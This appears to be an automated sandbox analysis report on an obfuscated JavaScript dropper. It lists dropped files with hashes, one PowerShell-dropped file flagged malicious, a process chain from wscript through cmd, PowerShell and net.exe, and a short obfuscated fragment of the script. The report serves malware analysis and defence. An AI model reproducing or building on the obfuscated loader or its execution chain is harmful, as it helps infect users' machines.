Size (bytes): | 291 |
Entropy (8bit): | 5.2736260383348 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXTBIdNGnZiQ0YpheoAvJfbPtdPeUkwRe9:YvXKXTaGcyhVGDV8Ukee9 |
MD5: | 0A2FA0D5C210BA90B6124354B5908FFE |
SHA1: | A684E5AC118CC179A74D462D96D81577453E316E |
SHA-256: | F09859AE23009B30EF183FD744D4622FA58741D915E1DE8B00AA8BDD2F0AEFB4 |
SHA-512: | 7930EC43EC8E3F9AC8EE5BB618AF6E8B058E2F8B48D2051A770C0835C035823786265088A3C35059799318F32314FA3F98F98AEAB7039DEA2530526811E8B6CD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.277164951631281 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXTBIdNGnZiQ0YpheoAvJf21rPeUkwRe9:YvXKXTaGcyhVG+16Ukee9 |
MD5: | 5D61E27656DF25989E28E5A43D3B6D72 |
SHA1: | 6BC5CDF9A95F2C633E5BF677B446214F1EB1F465 |
SHA-256: | ED11E740BC6150378876C4063C2B3FEB768935C7DCF2AF16708472FA882FAE18 |
SHA-512: | D8F6795EA9ED7A52EDC4C477FA00C45B70AA3E5B418F1BA7B09F1460306D457652742D603ABC4E2CAC667E3469C701D66A20D53C28A3E79BB8CB76388DEF73E4 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1090 |
Entropy (8bit): | 5.660548814773881 |
Encrypted: | false |
SSDEEP: | 24:Yv6XTkmmamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSkd:YvaoBgkDMUJUAh8cvMkd |
MD5: | F3FA5F5AD3AA7910C9D201A08ECC1FDF |
SHA1: | 87A47A235EB9B234AA733B7EADC58A25D5EFB46E |
SHA-256: | DCFD0EDD4A89C1BCFE2BC7B93A93996E8942ADACAF1E15C800B86F6821710228 |
SHA-512: | 0CD26166F2CD2A2F16EA2AA754710E7BE4C6CD9FCE04F669910FF5484AB5361AC5B7D9F24C17D173B5B90F6CD49D0B13AFF5F3AA2CA26D211A41F41B3D1F5CA4 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 286 |
Entropy (8bit): | 5.252900724305111 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXTBIdNGnZiQ0YpheoAvJfshHHrPeUkwRe9:YvXKXTaGcyhVGUUUkee9 |
MD5: | 386E3B06DFD9AA4B2A2C53C9E0015E49 |
SHA1: | 1DAC8256F5D93C667911C96E63D143F10A9DB777 |
SHA-256: | 12D59E6CF42819BB035D97BE984C01FAF24A2173123F04EBD78D00E93B36892C |
SHA-512: | 9DFE53E0B16E241F88CDA3A41866218D846DE27BD99997255B1A2349BA5377A76AADFF36E06C0B1C27B2E240F44533C435FABF8C7EB879D08CE23DE3519EB5CA |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 5.260549063282198 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXTBIdNGnZiQ0YpheoAvJTqgFCrPeUkwRe9:YvXKXTaGcyhVGTq16Ukee9 |
MD5: | EF5603901D21A49D327F451CE8F7BDAB |
SHA1: | B7E77BE44351A08FBF7989CB49F5D6D330AF0D87 |
SHA-256: | DF463481C5E7A98129C907023AC87B515BEDAD59546E4DC2728A793614F7D266 |
SHA-512: | 5CCF6059DE9918D5DE7F9743FAAEBCD829B38ED0537088C4E9B8EFDAAAEBFD5B5A9250FCB811B473EBA8B25EF5BC2A099A0B650B992DD3D48E5007DDEF620A94 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4 |
Entropy (8bit): | 0.8112781244591328 |
Encrypted: | false |
SSDEEP: | 3:e:e |
MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2814 |
Entropy (8bit): | 5.142575095493232 |
Encrypted: | false |
SSDEEP: | 48:YW3TNQD9ugSk/MB/eQSKi+F3vbuVs9VbTCCbZujAq9Clt97jKyi:33TCD9ugSk/MB/HSKi+F3viV8xbZujAC |
MD5: | 8F09FACB82EF3833C1BB0DE354021763 |
SHA1: | 91A5B3F93B155CA9CC68B78506F29C260E1EFCF9 |
SHA-256: | 2C0C46A45BFD7258A9B1F4F9518FD8C8C1627FE74AECB1BCA08B3F6BEBACD932 |
SHA-512: | 4BF7E106E10C1C5C236BFF3CC4C65ECB89C51AA403CADF8002B3E9F217A65CB22C1E23E91ADEBDD1A1F74357B35DC5D133903ED90B9EF42EBC481F8515CE2E88 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12288 |
Entropy (8bit): | 1.1470297890929486 |
Encrypted: | false |
SSDEEP: | 24:TLhx/XYKQvGJF7ursxyFlfRZXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUV:TFl2GL7msx6Xc+XcGNFlRYIX2v3k0M |
MD5: | 8BBE43CA34791EFF304B3490A2035076 |
SHA1: | 2ADB3FD167C9A6CB1B8E0033B7E2FB5A2D67109F |
SHA-256: | A35AA3B8917E33360C759F2E901AFA78C0586B26BB8A69EF15F2DD806872CAF3 |
SHA-512: | C68DD171F7A76653B0816F697AABF29DDCC004E7ACF7329691701E8499AC80A71D6E1435DF589EA268D6B2914FC40F37B188E9BB57CCA5B24B4351AF9EF89140 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 1.553266639787675 |
Encrypted: | false |
SSDEEP: | 24:7+t5eyFlfUXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudcHRuLux5zqLxj:7MgVXc+XcGNFlRYIX2vAzqVl2GL7msf |
MD5: | 5D95B0FBBF96E89673B17D8FE8B2834A |
SHA1: | BEE2364AB624BC5B983D3CA49D8533A07C772379 |
SHA-256: | B1FD3D48F2B297E7BEA059777180593B9C7DEEE6195BD470FD2D70CC71066D66 |
SHA-512: | 0612185330E5D46EE22F30526DD3A2C9C70F87206273ACCF3C1A30FDA42FB2945E2EB635304B34F33ED1701269DF2A7B2C48C9A7172071F859AAD99120DFD693 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66726 |
Entropy (8bit): | 5.392739213842091 |
Encrypted: | false |
SSDEEP: | 768:RNOpblrU6TBH44ADKZEg6dX8MbSZtpTJkI6kIdTPKs1ADcOYyu:6a6TZ44ADE6dwtUI6kE7KlpK |
MD5: | 269DE5F7B625FE318771040D8919E30E |
SHA1: | 3C6E3A6360260FCE8CB0FB1728CCB6238BBAF7FD |
SHA-256: | 9284EADB56F6D4FD2193782F4B12AF4F8855F765B8D705945A151F2BFB3E42ED |
SHA-512: | 5BFA9513EC52D366572C90E4FB28EB647947D482B064EA887E50DF7ACB8041610C58BC500D1810E2F586111A2F89E47C10F4833F4C7520A3521011367F24B9F1 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:Nlllul3nqth:NllUa |
MD5: | 851531B4FD612B0BC7891B3F401A478F |
SHA1: | 483F0D1E71FB0F6EFF159AA96CC82422CF605FB3 |
SHA-256: | 383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F |
SHA-512: | A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.4965336456103326 |
Encrypted: | false |
SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8EebClas:Qw946cPbiOxDlbYnuRK+b4 |
MD5: | 32B894D68DBFBE55CEFD7B3AA5591A0E |
SHA1: | 6E44EE3FE71A3587E7D8336292B39E631848DF28 |
SHA-256: | 0915333B9D413D475856EFEA3618DF11566F13D2E9E5ED283A2DD05CA7A58329 |
SHA-512: | 6D052FDE442488D7D83744BE60D16FC4F4D3DAF60D37FCE5BAF55D476C53BD8AA28F7898E8AD2F948E6F8005B9823637C7C20FC4D5F5A77604D99509CC2E1457 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-10 20-10-42-082.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16525 |
Entropy (8bit): | 5.338264912747007 |
Encrypted: | false |
SSDEEP: | 384:lH4ZASLaTgKoBKkrNdOZTfUY9/B6u6AJ8dbBNrSVNspYiz5LkiTjgjQLhDydAY8s:kIb |
MD5: | 128A51060103D95314048C2F32A15C66 |
SHA1: | EEB64761BE485729CD12BF4FBF7F2A68BA1AD7DB |
SHA-256: | 601388D70DFB723E560FEA6AE08E5FEE8C1A980DF7DF9B6C10E1EC39705D4713 |
SHA-512: | 55099B6F65D6EF41BC0C077BF810A13BA338C503974B4A5F2AA8EB286E1FCF49DF96318B1DA691296FB71AA8F2A2EA1406C4E86F219B40FB837F2E0BF208E677 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15114 |
Entropy (8bit): | 5.32474076197809 |
Encrypted: | false |
SSDEEP: | 384:doC9bVqLNyQyjrXmc+GVZ6ufQz6P0V9VtVc7IS5Pn3GCSudGsf5bu0FbSbW/M6hG:QZvnTP |
MD5: | 6B2C8603FC2D9C046829EF7D08BCAD54 |
SHA1: | B543571FF342860972CAA6A04F6F587EF265CB4E |
SHA-256: | 7F2B01000E405A6CA8A8E7C7C30EC54073AA76E0862950652151C456C205DC5D |
SHA-512: | 8FC89EC453F3FCF01668968C54E66DF072AB8A7A8D3641F2206A992EDA4F4B9F1230760FFE166E42A8B8FE94F6A78509584F7BF6999A6ACC5E1AE07B07E25144 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 29752 |
Entropy (8bit): | 5.391500477506194 |
Encrypted: | false |
SSDEEP: | 192:acb4I3dcbPcbaIO4cbYcbqnIdjcb6acbaIewcbjbcbCIqgcbJ:V3fOCIdJDeZ8qf |
MD5: | A1B2CD03FCE283CD3CD7459B91D49A75 |
SHA1: | A2F2AD51BDC798FCB62F982DB1B6D89D2332FE97 |
SHA-256: | E8747DF4176C8C50E58348388A2130A2DE31CB8EC59D080CBC7284449BF2F1B4 |
SHA-512: | 127BCBFB8E335926FF67B06042EC7815230CD87114031EDD083B5ADBFD636572C3B33650334C7CC420791E9FC197B9AF218BE5E620524AC895002D3AB6DBCE67 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1419751 |
Entropy (8bit): | 7.976496077007677 |
Encrypted: | false |
SSDEEP: | 24576:/xA7owWLkwYIGNPMGZfPdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLkwZGuGZn3mlind9i4ufFXpAXkru |
MD5: | CA6B0D9F8DDC295DACE8157B69CA7CF6 |
SHA1: | 6299B4A49AB28786E7BF75E1481D8011E6022AF4 |
SHA-256: | A933C727CE6547310A0D7DAD8704B0F16DB90E024218ACE2C39E46B8329409C7 |
SHA-512: | 9F150CDA866D433BD595F23124E369D2B797A0CA76A69BA98D30DF462F0A95D13E3B0834887B5CD2A032A55161A0DC8BB30C16AA89663939D6DCF83FAC056D34 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1407294 |
Entropy (8bit): | 7.97605879016224 |
Encrypted: | false |
SSDEEP: | 24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo |
MD5: | A0CFC77914D9BFBDD8BC1B1154A7B364 |
SHA1: | 54962BFDF3797C95DC2A4C8B29E873743811AD30 |
SHA-256: | 81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685 |
SHA-512: | 74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 758601 |
Entropy (8bit): | 7.98639316555857 |
Encrypted: | false |
SSDEEP: | 12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg |
MD5: | 3A49135134665364308390AC398006F1 |
SHA1: | 28EF4CE5690BF8A9E048AF7D30688120DAC6F126 |
SHA-256: | D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B |
SHA-512: | BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 386528 |
Entropy (8bit): | 7.9736851559892425 |
Encrypted: | false |
SSDEEP: | 6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m |
MD5: | 5C48B0AD2FEF800949466AE872E1F1E2 |
SHA1: | 337D617AE142815EDDACB48484628C1F16692A2F |
SHA-256: | F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE |
SHA-512: | 44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 635764 |
Entropy (8bit): | 7.929592005409041 |
Encrypted: | false |
SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98682 |
Entropy (8bit): | 6.445287254681573 |
Encrypted: | false |
SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
MD5: | 7113425405A05E110DC458BBF93F608A |
SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 737 |
Entropy (8bit): | 7.501268097735403 |
Encrypted: | false |
SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.903770262734948 |
TrID: | |
File name: | 3048426634198639173.js |
File size: | 20'117 bytes |
MD5: | 39dde2bac33c299bfc38d6046eea9a24 |
SHA1: | 8628031d554e1fe797b879a8700df6c48b2604d0 |
SHA256: | 811c088465e32a81d5792110162c54a68e674b2029575306c30370c3b0444964 |
SHA512: | 95507e810e5e21e39591b4d718e191068ad4444e7c23b3a123adac4ff3c0b56331ca81949b6cdf9097ef12f874fcc921d2af59744d28ebc4a788b382ce521815 |
SSDEEP: | 384:rI7CVTanusc6rek2m42sLCfor6Z7h8e2oDpmaYpiLB7seY49ze14MUkBWfhkqfy9:L2usc6rek2m42sLCfor6Z7h8e2oDpma0 |
TLSH: | 32926352CED8CA2346FD2734F68519E58EC5034058F0F0DAEEC176CA3564691FEEA2B6 |
File Content Preview: | function aawaq(){qfunh=[1031,3079,5127,4103,2055,3072];var chmgli=this[pwnowbac+hutztd+axhdhf+vqvtz+dbffr+tbalj+xjyaks+fvlhuns](this[epdyrruhy+vrsexu+pgxbtj+axhdhf+qvazzc+pwnowbac+fvlhuns][dearp+axhdhf+dbffr+hutztd+fvlhuns+dbffr+wbnlt+rntemotzz+fzloe+dbff |
Icon Hash: | 68d69b8bb6aa9a86 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 1 |
Start time: | 20:10:31 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff694fb0000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 20:10:33 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7bd620000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 20:10:33 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff66e660000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 20:10:34 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6e3d50000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 20:10:38 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff651090000 |
File size: | 5'641'176 bytes |
MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 6 |
Start time: | 20:10:38 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7bd620000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 20:10:38 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff77d2e0000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 8 |
Start time: | 20:10:39 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff70df30000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 9 |
Start time: | 20:10:39 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7403e0000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | false |
Target ID: | 10 |
Start time: | 20:10:39 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff70df30000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Has exited: | false |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function aawaq() { |
|
1 | qfunh = [ 1031, 3079, 5127, 4103, 2055, 3072 ]; | |
